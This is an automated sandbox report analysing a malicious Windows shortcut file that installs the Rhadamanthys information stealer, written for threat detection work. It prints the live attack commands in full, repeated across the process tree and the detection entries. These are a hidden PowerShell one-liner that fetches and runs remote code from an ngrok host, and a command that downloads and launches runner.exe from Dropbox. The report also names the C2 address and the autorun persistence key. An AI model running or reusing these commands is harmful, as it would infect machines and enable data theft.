Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
taCCGTk8n1.lnk

Overview

General Information

Sample name:taCCGTk8n1.lnk
renamed because original name is a hash value
Original sample name:48ea3e8097aa3314fc7fbfb73abdc072031989ef9ba14ff669d40c0633d13845.lnk
Analysis ID:1572662
MD5:791c4736be53604b8bb0979bac3a49b8
SHA1:6c406a9f2942d6fbe7d5df5a9b6b050c250c4a4e
SHA256:48ea3e8097aa3314fc7fbfb73abdc072031989ef9ba14ff669d40c0633d13845
Tags:Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT
Infos:

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Detected suspicious crossdomain redirect
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 5232 cmdline: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 712 cmdline: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • msedge.exe (PID: 2644 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 MD5: BF154738460E4AB1D388970E1AB13FAB)
        • msedge.exe (PID: 2812 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2088,i,4290676107445022345,3806009020306178634,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
      • cmd.exe (PID: 4976 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\697963187.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6976 cmdline: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • msedge.exe (PID: 9032 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1225428425.pdf MD5: BF154738460E4AB1D388970E1AB13FAB)
            • msedge.exe (PID: 8812 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2108,i,10734861475087244222,18214222288503595443,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
          • 1718218388.exe (PID: 6780 cmdline: "C:\Users\user\AppData\Local\Temp\1718218388.exe" MD5: DFED8A8BF0531716FD932A0A81CB14CD)
            • 1718218388.exe (PID: 4236 cmdline: "C:\Users\user\AppData\Local\Temp\1718218388.exe" MD5: DFED8A8BF0531716FD932A0A81CB14CD)
              • fontdrvhost.exe (PID: 8560 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
                • fontdrvhost.exe (PID: 5688 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
                  • WerFault.exe (PID: 2792 cmdline: C:\Windows\system32\WerFault.exe -u -p 5688 -s 136 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • WerFault.exe (PID: 8484 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 432 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 5664 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msedge.exe (PID: 5440 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 7420 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8264 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6520 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8276 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6808 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • identity_helper.exe (PID: 8432 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=5004 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • identity_helper.exe (PID: 8468 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=5004 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • msedge.exe (PID: 9048 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7388 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 7656 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8888 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:6 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8352 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6816 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search user.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://104.161.43.18:2845/7e56fc199c7194d0/h4qwbjtf.qjde4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001D.00000002.2843630378.0000000002E00000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    0000001C.00000003.2716353385.0000000000A10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
      0000001D.00000003.2725119697.00000000050D0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        0000001C.00000003.2719902686.0000000003170000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          0000001C.00000003.2719658263.0000000002F50000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            28.3.1718218388.exe.3170000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              29.3.fontdrvhost.exe.4eb0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                29.3.fontdrvhost.exe.50d0000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  29.3.fontdrvhost.exe.50d0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    28.3.1718218388.exe.3170000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 1 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powerup Write Hijack DLL
                      Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 712, TargetFilename: C:\Users\user\AppData\Local\Temp\697963187.bat
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\1718218388.exe, ProcessId: 6780, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DiskTuner
                      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 712, TargetFilename: C:\Users\user\AppData\Local\Temp\697963187.bat
                      Sigma detected: PowerShell Web Download
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE", CommandLine: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\697963187.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4976, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE", ProcessId: 6976, ProcessName: powershell.exe
                      Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5232, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing), ProcessId: 712, ProcessName: powershell.exe
                      Sigma detected: Usage Of Web Request Commands And Cmdlets
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing), ProcessId: 5232, ProcessName: cmd.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5232, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing), ProcessId: 712, ProcessName: powershell.exe
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5664, ProcessName: svchost.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-10T18:40:24.854097+010028032742Potentially Bad Traffic192.168.2.649731162.125.65.18443TCP
                      2024-12-10T18:40:38.320821+010028032742Potentially Bad Traffic192.168.2.649817162.125.65.18443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-10T18:41:11.285923+010028548021Domain Observed Used for C2 Detected104.161.43.182845192.168.2.649908TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://104.161.43.18:2845/7e56fc199c7194d0/h4qwbjtf.qjde4"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeReversingLabs: Detection: 55%
                      Multi AV Scanner detection for submitted file
                      Source: taCCGTk8n1.lnkReversingLabs: Detection: 21%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Machine Learning detection for sample
                      Source: taCCGTk8n1.lnkJoe Sandbox ML: detected
                      Source: unknownHTTPS traffic detected: 3.125.209.94:443 -> 192.168.2.6:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.6:49709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.6:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49723 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.6:49742 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.6:49761 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.6:49797 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49791 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.6:49831 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49852 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49899 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49962 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50027 version: TLS 1.2
                      Source: Binary string: wkernel32.pdb source: 1718218388.exe, 0000001C.00000003.2719286555.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2719389074.0000000003070000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2723943558.0000000003220000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2724115400.0000000004F30000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: 1718218388.exe, 0000001C.00000003.2719902686.0000000003170000.00000004.00000001.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2719658263.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2725119697.00000000050D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2724535422.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: 1718218388.exe, 0000001C.00000003.2718199192.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2718494359.0000000003140000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2722250208.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: 1718218388.exe, 0000001C.00000003.2718838717.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2719033779.00000000030F0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: 1718218388.exe, 0000001C.00000003.2718199192.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2718494359.0000000003140000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2722250208.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: 1718218388.exe, 0000001C.00000003.2718838717.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2719033779.00000000030F0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: 1718218388.exe, 0000001C.00000003.2719286555.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2719389074.0000000003070000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2723943558.0000000003220000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2724115400.0000000004F30000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: 1718218388.exe, 0000001C.00000003.2719902686.0000000003170000.00000004.00000001.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2719658263.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2725119697.00000000050D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2724535422.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 4x nop then dec esp33_2_000001B9A47B0511

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 104.161.43.18:2845 -> 192.168.2.6:49908
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://104.161.43.18:2845/7e56fc199c7194d0/h4qwbjtf.qjde4
                      Source: global trafficTCP traffic: 192.168.2.6:49908 -> 104.161.43.18:2845
